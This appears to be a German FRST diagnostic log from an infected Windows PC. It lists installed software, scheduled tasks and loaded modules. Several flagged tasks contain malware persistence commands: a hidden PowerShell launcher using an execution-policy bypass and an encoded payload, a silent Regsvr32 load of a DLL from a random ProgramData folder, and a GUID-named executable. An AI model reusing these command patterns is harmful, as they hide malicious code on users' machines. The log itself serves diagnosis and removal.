Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-07 17:13 - 2017-05-21 20:55 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
